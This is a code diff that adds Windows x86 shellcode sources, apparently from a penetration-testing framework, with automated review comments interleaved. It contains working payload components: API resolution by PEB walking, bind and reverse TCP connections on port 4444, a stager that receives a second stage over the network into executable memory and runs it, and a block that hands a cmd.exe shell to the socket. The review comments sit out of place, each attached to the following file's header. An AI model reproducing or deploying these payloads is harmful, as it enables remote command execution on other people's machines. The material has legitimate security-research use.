diff --git a/external/source/shellcode/windows/x86/bin/single_exec.bin b/external/source/shellcode/windows/x86/bin/single_exec.bin
new file mode 100644
index 0000000000..0921c12441
Binary files /dev/null and b/external/source/shellcode/windows/x86/bin/single_exec.bin differ
diff --git a/external/source/shellcode/windows/x86/bin/single_shell_bind_tcp.bin b/external/source/shellcode/windows/x86/bin/single_shell_bind_tcp.bin
new file mode 100644
index 0000000000..baab97f538
Binary files /dev/null and b/external/source/shellcode/windows/x86/bin/single_shell_bind_tcp.bin differ
diff --git a/external/source/shellcode/windows/x86/bin/single_shell_reverse_tcp.bin b/external/source/shellcode/windows/x86/bin/single_shell_reverse_tcp.bin
new file mode 100644
index 0000000000..4649fec83f
Binary files /dev/null and b/external/source/shellcode/windows/x86/bin/single_shell_reverse_tcp.bin differ
diff --git a/external/source/shellcode/windows/x86/bin/stage_shell.bin b/external/source/shellcode/windows/x86/bin/stage_shell.bin
new file mode 100644
index 0000000000..9132450780
Binary files /dev/null and b/external/source/shellcode/windows/x86/bin/stage_shell.bin differ
diff --git a/external/source/shellcode/windows/x86/bin/stage_upexec.bin b/external/source/shellcode/windows/x86/bin/stage_upexec.bin
new file mode 100644
index 0000000000..1c3ab9fc4a
Binary files /dev/null and b/external/source/shellcode/windows/x86/bin/stage_upexec.bin differ
diff --git a/external/source/shellcode/windows/x86/bin/stager_bind_tcp_nx.bin b/external/source/shellcode/windows/x86/bin/stager_bind_tcp_nx.bin
new file mode 100644
index 0000000000..2343da3f0e
Binary files /dev/null and b/external/source/shellcode/windows/x86/bin/stager_bind_tcp_nx.bin differ
diff --git a/external/source/shellcode/windows/x86/bin/stager_reverse_tcp_nx.bin b/external/source/shellcode/windows/x86/bin/stager_reverse_tcp_nx.bin
new file mode 100644
index 0000000000..47438d4385
Binary files /dev/null and b/external/source/shellcode/windows/x86/bin/stager_reverse_tcp_nx.bin differ
diff --git a/external/source/shellcode/windows/x86/build.py b/external/source/shellcode/windows/x86/build.py
new file mode 100644
index 0000000000..4526138956
--- /dev/null
+++ b/external/source/shellcode/windows/x86/build.py
@@ -0,0 +1,98 @@
+#=============================================================================#
+# A simple python build script to build the singles/stages/stagers and
+# some usefull information such as offsets and a hex dump. The binary output
+# will be placed in the bin directory. A hex string and usefull comments will
+# be printed to screen.
+#
+# Example:
+# >python build.py stager_reverse_tcp_nx
+#
+# Example, to build everything:
+# >python build.py all > build_output.txt
+#
+# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+#=============================================================================#
+import os, sys, time
+from subprocess import Popen
+from struct import pack
+#=============================================================================#
+def clean( dir="./bin/" ):
+ for root, dirs, files in os.walk( dir ):
+ for name in files:
+ os.remove( os.path.join( root, name ) )
+#=============================================================================#
+def locate( src_file, dir="./src/" ):
+ for root, dirs, files in os.walk( dir ):
+ for name in files:
+ if src_file == name:
+ return root
+ return None
+#=============================================================================#
+def build( name ):
+ location = locate( "%s.asm" % name )
+ if location:
+ input = os.path.normpath( os.path.join( location, name ) )
+ output = os.path.normpath( os.path.join( "./bin/", name ) )
+ p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )
+ p.wait()
+ xmit( name )
+ else:
+ print "[-] Unable to locate '%s.asm' in the src directory" % name
+#=============================================================================#
+def xmit_dump_ruby( data, length=16 ):
+ dump = ""
+ for i in xrange( 0, len( data ), length ):
+ bytes = data[ i : i+length ]
+ hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) )
+ if i+length <= len(data):
+ hex += " +"
+ dump += "%s\n" % ( hex )
+ print dump
+#=============================================================================#
+def xmit_offset( data, name, value ):
+ offset = data.find( value );
+ if offset != -1:
+ print "# %s Offset: %d" % ( name, offset )
+#=============================================================================#
+def xmit( name, dump_ruby=True ):
+ bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) )
+ f = open( bin, 'rb')
+ data = f.read()
+ print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
+ xmit_offset( data, "Port", pack( ">H", 4444 ) ) # 4444
+ xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) ) # 127.0.0.1
+ xmit_offset( data, "ExitFunk", pack( "]"
+ else:
+ print "# Built on %s\n" % ( time.asctime( time.localtime() ) )
+ if argv[1] == "clean":
+ clean()
+ elif argv[1] == "all":
+ for root, dirs, files in os.walk( "./src/single/" ):
+ for name in files:
+ build( name[:-4] )
+ for root, dirs, files in os.walk( "./src/stage/" ):
+ for name in files:
+ build( name[:-4] )
+ for root, dirs, files in os.walk( "./src/stager/" ):
+ for name in files:
+ build( name[:-4] )
+ else:
+ build( argv[1] )
+ except Exception, e:
+ print "[-] ", e
+#=============================================================================#
+if __name__ == "__main__":
+ main()
+#=============================================================================#
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/block/block_api.asm b/external/source/shellcode/windows/x86/src/block/block_api.asm
new file mode 100644
index 0000000000..2acc13ddec
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/block/block_api.asm
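Review bot: build() discards nasm's exit status: `p.wait()` is called only for its side effect and `xmit( name )` then runs unconditionally, so a failed assemble still prints offsets and a hex dump from whatever ./bin/ already held for that name, or dies with an IOError from the open() in xmit when nothing is there. Guard it with `if p.wait() != 0:` / `print "[-] nasm failed for %s" % name` / `return` before the xmit call. The `"-f bin"` and `"-o %s.bin" % output` entries also pack an option and its value into a single argv element; with shell=False that relies on nasm accepting the leading space in the value, and the conventional list form is separate elements, `"-f", "bin", "-O3", "-o", "%s.bin" % output`. In xmit_dump_ruby, `bytes` and `hex` shadow builtins; names like `chunk` and `line` would avoid that. The middle of this hunk (the end of xmit and the start of main, including the usage line) is not legible in this rendering and was not reviewed.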
@@ -0,0 +1,97 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+; Size: 137 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+
+; Input: The hash of the API to call and all its parameters must be pushed onto stack.
+; Output: The return value from the API call will be in EAX.
+; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
+; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
+; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
+; Note: This function is unable to call forwarded exports.
+
+api_call:
+ pushad ; We preserve all the registers for the caller, bar EAX and ECX.
+ mov ebp, esp ; Create a new stack frame
+ xor edx, edx ; Zero EDX
+ mov edx, [fs:edx+48] ; Get a pointer to the PEB
+ mov edx, [edx+12] ; Get PEB->Ldr
+ mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
+next_mod: ;
+ mov esi, [edx+40] ; Get pointer to modules name (unicode string)
+ movzx ecx, word [edx+38] ; Set ECX to the length we want to check
+ xor edi, edi ; Clear EDI which will store the hash of the module name
+loop_modname: ;
+ xor eax, eax ; Clear EAX
+ lodsb ; Read in the next byte of the name
+ cmp al, 'a' ; Some versions of Windows use lower case module names
+ jl not_lowercase ;
+ sub al, 0x20 ; If so normalise to uppercase
+not_lowercase: ;
+ ror edi, 13 ; Rotate right our hash value
+ add edi, eax ; Add the next byte of the name
+ loop loop_modname ; Loop untill we have read enough
+ ; We now have the module hash computed
+ push edx ; Save the current position in the module list for later
+ push edi ; Save the current module hash for later
+ ; Proceed to itterate the export address table,
+ mov edx, [edx+16] ; Get this modules base address
+ mov eax, [edx+60] ; Get PE header
+ add eax, edx ; Add the modules base address
+ mov eax, [eax+120] ; Get export tables RVA
+ test eax, eax ; Test if no export address table is present
+ jz get_next_mod1 ; If no EAT present, process the next module
+ add eax, edx ; Add the modules base address
+ push eax ; Save the current modules EAT
+ mov ecx, [eax+24] ; Get the number of function names
+ mov ebx, [eax+32] ; Get the rva of the function names
+ add ebx, edx ; Add the modules base address
+ ; Computing the module hash + function hash
+get_next_func: ;
+ jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
+ dec ecx ; Decrement the function name counter
+ mov esi, [ebx+ecx*4] ; Get rva of next module name
+ add esi, edx ; Add the modules base address
+ xor edi, edi ; Clear EDI which will store the hash of the function name
+ ; And compare it to the one we want
+loop_funcname: ;
+ xor eax, eax ; Clear EAX
+ lodsb ; Read in the next byte of the ASCII function name
+ ror edi, 13 ; Rotate right our hash value
+ add edi, eax ; Add the next byte of the name
+ cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
+ jne loop_funcname ; If we have not reached the null terminator, continue
+ add edi, [ebp-8] ; Add the current module hash to the function hash
+ cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
+ jnz get_next_func ; Go compute the next function hash if we have not found it
+ ; If found, fix up stack, call the function and then value else compute the next one...
+ pop eax ; Restore the current modules EAT
+ mov ebx, [eax+36] ; Get the ordinal table rva
+ add ebx, edx ; Add the modules base address
+ mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
+ mov ebx, [eax+28] ; Get the function addresses table rva
+ add ebx, edx ; Add the modules base address
+ mov eax, [ebx+4*ecx] ; Get the desired functions RVA
+ add eax, edx ; Add the modules base address to get the functions actual VA
+ ; We now fix up the stack and perform the call to the desired function...
+finish:
+ mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad
+ pop ebx ; Clear off the current modules hash
+ pop ebx ; Clear off the current position in the module list
+ popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
+ pop ecx ; Pop off the origional return address our caller will have pushed
+ pop edx ; Pop off the hash value our caller will have pushed
+ push ecx ; Push back the correct return value
+ jmp eax ; Jump into the required function
+ ; We now automagically return to the correct caller...
+get_next_mod: ;
+ pop eax ; Pop off the current (now the previous) modules EAT
+get_next_mod1: ;
+ pop edi ; Pop off the current (now the previous) modules hash
+ pop edx ; Restore our position in the module list
+ mov edx, [edx] ; Get the next module
+ jmp short next_mod ; Process this module
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/block/block_bind_tcp.asm b/external/source/shellcode/windows/x86/src/block/block_bind_tcp.asm
new file mode 100644
index 0000000000..cad1aaba86
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/block/block_bind_tcp.asm
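Review bot: The clobber documentation in this hunk disagrees with itself: the comment on the opening `pushad` says the registers are preserved "bar EAX and ECX", while the header ("Clobbers: EAX, ECX and EDX") and the comment on the closing `popad` ("bar EAX, ECX and EDX") both include EDX, which the `pop edx` after popad does overwrite. Align the first comment with the other two: `pushad ; We preserve all the registers for the caller, bar EAX, ECX and EDX.` The header's "Clobbers" and "Un-Clobbered" lines are what callers of api_call rely on, so the in-body comments should not understate the set.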
@@ -0,0 +1,63 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer@harmonysecurity.com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'.
+; Output: EDI will be the newly connected clients socket
+; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+bind_tcp:
+ push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
+ push 0x5F327377 ; ...
+ push esp ; Push a pointer to the "ws2_32" string on the stack.
+ push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
+ call ebp ; LoadLibraryA( "ws2_32" )
+
+ mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
+ sub esp, eax ; alloc some space for the WSAData structure
+ push esp ; push a pointer to this stuct
+ push eax ; push the wVersionRequested parameter
+ push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
+ call ebp ; WSAStartup( 0x0190, &WSAData );
+
+ push eax ; if we succeed, eax wil be zero, push zero for the flags param.
+ push eax ; push null for reserved parameter
+ push eax ; we do not specify a WSAPROTOCOL_INFO structure
+ push eax ; we do not specify a protocol
+ inc eax ;
+ push eax ; push SOCK_STREAM
+ inc eax ;
+ push eax ; push AF_INET
+ push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
+ call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
+ mov edi, eax ; save the socket for later
+
+ xor ebx, ebx ; Clear EBX
+ push ebx ; bind to 0.0.0.0
+ push 0x5C110002 ; family AF_INET and port 4444
+ mov esi, esp ; save a pointer to sockaddr_in struct
+ push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
+ push esi ; pointer to the sockaddr_in struct
+ push edi ; socket
+ push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" )
+ call ebp ; bind( s, &sockaddr_in, 16 );
+
+ push ebx ; backlog
+ push edi ; socket
+ push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" )
+ call ebp ; listen( s, 0 );
+
+ push ebx ; we set length for the sockaddr struct to zero
+ push ebx ; we dont set the optional sockaddr param
+ push edi ; listening socket
+ push 0xE13BEC74 ; hash( "ws2_32.dll", "accept" )
+ call ebp ; accept( s, 0, 0 );
+
+ push edi ; push the listening socket to close
+ mov edi, eax ; swap the new connected socket over the listening socket
+ push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
+ call ebp ; closesocket( s );
+
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/block/block_exitfunk.asm b/external/source/shellcode/windows/x86/src/block/block_exitfunk.asm
new file mode 100644
index 0000000000..2e4d01a992
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/block/block_exitfunk.asm
@@ -0,0 +1,52 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+; Size: 31 bytes
+;-----------------------------------------------------------------------------;
+; kernel32.dll!SetUnhandledExceptionFilter (0xEA320EFE) - This exit function
+; will let the UnhandledExceptionFilter function perform its default handling
+; routine.
+;
+; kernel32.dll!ExitProcess (0x56A2B5F0) - This exit function will force the
+; process to terminate.
+;
+; kernel32.dll!ExitThread (0x0A2A1DE0) - This exit function will force the
+; current thread to terminate. On Windows 2008, Vista and 7 this function is
+; a forwarded export to ntdll.dll!RtlExitUserThread and as such cannot be
+; called by the api_call function.
+;
+; ntdll.dll!RtlExitUserThread (0x6F721347) - This exit function will force
+; the current thread to terminate. This function is not available on Windows
+; NT or 2000.
+;-----------------------------------------------------------------------------;
+; Windows 7 6.1
+; Windows Server 2008 R2 6.1 If the EXITFUNK is ExitThread we must call
+; Windows Server 2008 6.0 RtlExitUserThread instead.
+; Windows Vista 6.0 _______________________________________________
+; Windows Server 2003 R2 5.2
+; Windows Server 2003 5.2
+; Windows XP 5.1
+; Windows 2000 5.0
+; Windows NT4 4.0
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'.
+; Output: None.
+; Clobbers: EAX, EBX, (ESP will also be modified)
+; Note: Execution is not expected to (successfully) continue past this block
+
+exitfunk:
+ mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
+ push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
+ call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
+ cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
+ jl short goodbye ; Then just call the exit function...
+ cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
+ jne short goodbye ;
+ mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+goodbye: ; We now perform the actual call to the exit function
+ push byte 0 ; push the exit function parameter
+ push ebx ; push the hash of the exit function
+ call ebp ; call EXITFUNK( 0 );
diff --git a/external/source/shellcode/windows/x86/src/block/block_recv.asm b/external/source/shellcode/windows/x86/src/block/block_recv.asm
new file mode 100644
index 0000000000..a821bf5714
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/block/block_recv.asm
@@ -0,0 +1,44 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Compatible: block_bind_tcp, block_reverse_tcp
+
+; Input: EBP must be the address of 'api_call'. EDI must be the socket. ESI is a pointer on stack.
+; Output: None.
+; Clobbers: EAX, EBX, ESI, (ESP will also be modified)
+
+recv:
+ ; Receive the size of the incoming second stage...
+ push byte 0 ; flags
+ push byte 4 ; length = sizeof( DWORD );
+ push esi ; the 4 byte buffer on the stack to hold the second stage length
+ push edi ; the saved socket
+ push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
+ call ebp ; recv( s, &dwLength, 4, 0 );
+ ; Alloc a RWX buffer for the second stage
+ mov esi, [esi] ; dereference the pointer to the second stage length
+ push byte 0x40 ; PAGE_EXECUTE_READWRITE
+ push 0x1000 ; MEM_COMMIT
+ push esi ; push the newly recieved second stage length.
+ push byte 0 ; NULL as we dont care where the allocation is.
+ push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
+ call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+ ; Receive the second stage and execute it...
+ mov ebx, eax ; ebx = our new memory address for the new stage
+ push ebx ; push the address of the new stage so we can return into it
+read_more: ;
+ push byte 0 ; flags
+ push esi ; length
+ push ebx ; the current address into our second stages RWX buffer
+ push edi ; the saved socket
+ push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
+ call ebp ; recv( s, buffer, length, 0 );
+ add ebx, eax ; buffer += bytes_received
+ sub esi, eax ; length -= bytes_received
+ test esi, esi ; test length
+ jnz read_more ; continue if we have more to read
+ ret ; return into the second stage
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm b/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm
new file mode 100644
index 0000000000..da3b03d14b
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm
@@ -0,0 +1,45 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'.
+; Output: EDI will be the socket for the connection to the server
+; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+reverse_tcp:
+ push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
+ push 0x5F327377 ; ...
+ push esp ; Push a pointer to the "ws2_32" string on the stack.
+ push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
+ call ebp ; LoadLibraryA( "ws2_32" )
+
+ mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
+ sub esp, eax ; alloc some space for the WSAData structure
+ push esp ; push a pointer to this stuct
+ push eax ; push the wVersionRequested parameter
+ push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
+ call ebp ; WSAStartup( 0x0190, &WSAData );
+
+ push eax ; if we succeed, eax wil be zero, push zero for the flags param.
+ push eax ; push null for reserved parameter
+ push eax ; we do not specify a WSAPROTOCOL_INFO structure
+ push eax ; we do not specify a protocol
+ inc eax ;
+ push eax ; push SOCK_STREAM
+ inc eax ;
+ push eax ; push AF_INET
+ push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
+ call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
+ mov edi, eax ; save the socket for later
+
+ push 0x0100007F ; host 127.0.0.1
+ push 0x5C110002 ; family AF_INET and port 4444
+ mov esi, esp ; save pointer to sockaddr struct
+ push byte 16 ; length of the sockaddr struct
+ push esi ; pointer to the sockaddr struct
+ push edi ; the socket
+ push 0x6174A599 ; hash( "ws2_32.dll", "connect" )
+ call ebp ; connect( s, &sockaddr, 16 );
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/block/block_shell.asm b/external/source/shellcode/windows/x86/src/block/block_shell.asm
new file mode 100644
index 0000000000..359da6ae6a
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/block/block_shell.asm
@@ -0,0 +1,49 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'. EDI must be a socket.
+; Output: None.
+; Clobbers: EAX, EBX, ECX, ESI, ESP will also be modified
+
+shell:
+ push 0x00646D63 ; push our command line: 'cmd',0
+ mov ebx, esp ; save a pointer to the command line
+ push edi ; our socket becomes the shells hStdError
+ push edi ; our socket becomes the shells hStdOutput
+ push edi ; our socket becomes the shells hStdInput
+ xor esi, esi ; Clear ESI for all the NULL's we need to push
+ push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack
+ pop ecx ; Set ECX for the loop
+push_loop: ;
+ push esi ; push a null dword
+ loop push_loop ; keep looping untill we have pushed enough nulls
+ mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
+ lea eax, [esp + 16] ; Set EAX as a pointer to our STARTUPINFO Structure
+ mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
+ ; perform the call to CreateProcessA
+ push esp ; Push the pointer to the PROCESS_INFORMATION Structure
+ push eax ; Push the pointer to the STARTUPINFO Structure
+ push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
+ push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
+ push esi ; We dont specify any dwCreationFlags
+ inc esi ; Increment ESI to be one
+ push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
+ dec esi ; Decrement ESI back down to zero
+ push esi ; Set lpThreadAttributes to NULL
+ push esi ; Set lpProcessAttributes to NULL
+ push ebx ; Set the lpCommandLine to point to "cmd",0
+ push esi ; Set lpApplicationName to NULL as we are using the command line param instead
+ push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" )
+ call ebp ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi );
+ ; perform the call to WaitForSingleObject
+ mov eax, esp ; save pointer to the PROCESS_INFORMATION Structure
+ dec esi ; Decrement ESI down to -1 (INFINITE)
+ push esi ; push INFINITE inorder to wait forever
+ inc esi ; Increment ESI back to zero
+ push dword [eax] ; push the handle from our PROCESS_INFORMATION.hProcess
+ push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" )
+ call ebp ; WaitForSingleObject( pi.hProcess, INFINITE );
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/hash.py b/external/source/shellcode/windows/x86/src/hash.py
new file mode 100644
index 0000000000..18ba57afac
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/hash.py
@@ -0,0 +1,146 @@
+#=============================================================================#
+# This script can detect hash collisions between exported API functions in
+# multiple modules by either scanning a directory tree or just a single module.
+# This script can also just output the correct hash value for any single API
+# function for use with the 'api_call' function in 'block_api.asm'.
+#
+# Example: Detect fatal collisions against all modules in the C drive:
+# >hash.py /dir c:\
+#
+# Example: List the hashes for all exports from kernel32.dll (As found in 'c:\windows\system32\')
+# >hash.py /mod c:\windows\system32\ kernel32.dll
+#
+# Example: Simply print the correct hash value for the function kernel32.dll!WinExec
+# >hash.py kernel32.dll WinExec
+#
+# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+#=============================================================================#
+from sys import path
+import os, time, sys
+
+# Modify this path to pefile to suit your machine...
+pefile_path = "D:\\Development\\Frameworks\\pefile\\"
+
+path.append( pefile_path )
+import pefile
+#=============================================================================#
+collisions = [ ( 0x006B8029, "ws2_32.dll!WSAStartup" ),
+ ( 0xE0DF0FEA, "ws2_32.dll!WSASocketA" ),
+ ( 0x6737DBC2, "ws2_32.dll!bind" ),
+ ( 0xFF38E9B7, "ws2_32.dll!listen" ),
+ ( 0xE13BEC74, "ws2_32.dll!accept" ),
+ ( 0x614D6E75, "ws2_32.dll!closesocket" ),
+ ( 0x6174A599, "ws2_32.dll!connect" ),
+ ( 0x5FC8D902, "ws2_32.dll!recv" ),
+ ( 0x5F38EBC2, "ws2_32.dll!send" ),
+
+ ( 0x5BAE572D, "kernel32.dll!WriteFile" ),
+ ( 0x4FDAF6DA, "kernel32.dll!CreateFileA" ),
+ ( 0x13DD2ED7, "kernel32.dll!DeleteFileA" ),
+ ( 0xE449F330, "kernel32.dll!GetTempPathA" ),
+ ( 0x528796C6, "kernel32.dll!CloseHandle" ),
+ ( 0x863FCC79, "kernel32.dll!CreateProcessA" ),
+ ( 0xE553A458, "kernel32.dll!VirtualAlloc" ),
+ ( 0x300F2F0B, "kernel32.dll!VirtualFree" ),
+ ( 0x0726774C, "kernel32.dll!LoadLibraryA" ),
+ ( 0x7802F749, "kernel32.dll!GetProcAddress" ),
+ ( 0x601D8708, "kernel32.dll!WaitForSingleObject" ),
+ ( 0x876F8B31, "kernel32.dll!WinExec" ),
+ ( 0x9DBD95A6, "kernel32.dll!GetVersion" ),
+ ( 0xEA320EFE, "kernel32.dll!SetUnhandledExceptionFilter" ),
+ ( 0x56A2B5F0, "kernel32.dll!ExitProcess" ),
+ ( 0x0A2A1DE0, "kernel32.dll!ExitThread" ),
+
+ ( 0x6F721347, "ntdll.dll!RtlExitUserThread" ),
+
+ ( 0x23E38427, "advapi32.dll!RevertToSelf" )
+ ]
+
+collisions_detected = {}
+modules_scanned = 0
+functions_scanned = 0
+#=============================================================================#
+def ror( dword, bits ):
+ return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF
+#=============================================================================#
+def unicode( string, uppercase=True ):
+ result = "";
+ if uppercase:
+ string = string.upper()
+ for c in string:
+ result += c + "\x00"
+ return result
+#=============================================================================#
+def hash( module, function, bits=13, print_hash=True ):
+ module_hash = 0
+ function_hash = 0
+ for c in unicode( module + "\x00" ):
+ module_hash = ror( module_hash, bits )
+ module_hash += ord( c )
+ for c in str( function + "\x00" ):
+ function_hash = ror( function_hash, bits )
+ function_hash += ord( c )
+ h = module_hash + function_hash & 0xFFFFFFFF
+ if print_hash:
+ print "[+] 0x%08X = %s!%s" % ( h, module.lower(), function )
+ return h
+#=============================================================================#
+def scan( dll_path, dll_name, print_hashes=False, print_collisions=True ):
+ global modules_scanned
+ global functions_scanned
+ try:
+ dll_name = dll_name.lower()
+ modules_scanned += 1
+ pe = pefile.PE( os.path.join( dll_path, dll_name ) )
+ for export in pe.DIRECTORY_ENTRY_EXPORT.symbols:
+ if export.name is None:
+ continue
+ h = hash( dll_name, export.name, print_hash=print_hashes )
+ for ( col_hash, col_name ) in collisions:
+ if col_hash == h and col_name != "%s!%s" % (dll_name, export.name):
+ if h not in collisions_detected.keys():
+ collisions_detected[h] = []
+ collisions_detected[h].append( (dll_path, dll_name, export.name) )
+ break
+ functions_scanned += 1
+ except:
+ pass
+#=============================================================================#
+def scan_directory( dir ):
+ for dot, dirs, files in os.walk( dir ):
+ for file_name in files:
+ if file_name[-4:] == ".dll":# or file_name[-4:] == ".exe":
+ scan( dot, file_name )
+ print "\n[+] Found %d Collisions.\n" % ( len(collisions_detected) )
+ for h in collisions_detected.keys():
+ for (col_hash, col_name ) in collisions:
+ if h == col_hash:
+ detected_name = col_name
+ break
+ print "[!] Collision detected for 0x%08X (%s):" % ( h, detected_name )
+ for (collided_dll_path, collided_dll_name, collided_export_name) in collisions_detected[h]:
+ print "\t%s!%s (%s)" % ( collided_dll_name, collided_export_name, collided_dll_path )
+ print "\n[+] Scanned %d exported functions via %d modules.\n" % ( functions_scanned, modules_scanned )
+#=============================================================================#
+def main( argv=None ):
+ if not argv:
+ argv = sys.argv
+ try:
+ if len( argv ) == 1:
+ print "Usage: hash.py [/dir ] | [/mod ] | [ ]"
+ else:
+ print "[+] Ran on %s\n" % ( time.asctime( time.localtime() ) )
+ if argv[1] == "/dir":
+ print "[+] Scanning directory '%s' for collisions..." % argv[2]
+ scan_directory( argv[2] )
+ elif argv[1] == "/mod":
+ print "[+] Scanning module '%s' in directory '%s'..." % ( argv[3], argv[2] )
+ scan( argv[2], argv[3], print_hashes=True )
+ else:
+ hash( argv[1], argv[2] )
+ except Exception, e:
+ print "[-] ", e
+#=============================================================================#
+if __name__ == "__main__":
+ main()
+#=============================================================================#
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/single/single_exec.asm b/external/source/shellcode/windows/x86/src/single/single_exec.asm
new file mode 100644
index 0000000000..bacbff30ae
--- /dev/null
+++ b/external/source/shellcode/windows/x86/src/single/single_exec.asm
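Review bot: scan()'s bare `except: pass` swallows everything, including KeyboardInterrupt and SystemExit under Python 2, so a long `/dir` walk cannot be interrupted cleanly and a module pefile cannot parse is skipped silently while still counted in modules_scanned (the increment precedes the pefile.PE call). Narrow it and report the failure: `except ( IOError, pefile.PEFormatError ), e:` / `print "[-] %s: %s" % ( dll_name, e )`. The `print_collisions` parameter of scan() is never read, `hash` and `unicode` shadow builtins (the latter is the Python 2 text type), and `if h not in collisions_detected.keys():` builds a list per export under Python 2 where `if h not in collisions_detected:` is the same test. The committed `pefile_path` is a machine-specific absolute path; reading it from an environment variable or simply relying on an installed pefile would keep the script runnable elsewhere. The usage string in main() is not fully legible in this rendering.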
@@ -0,0 +1,26 @@
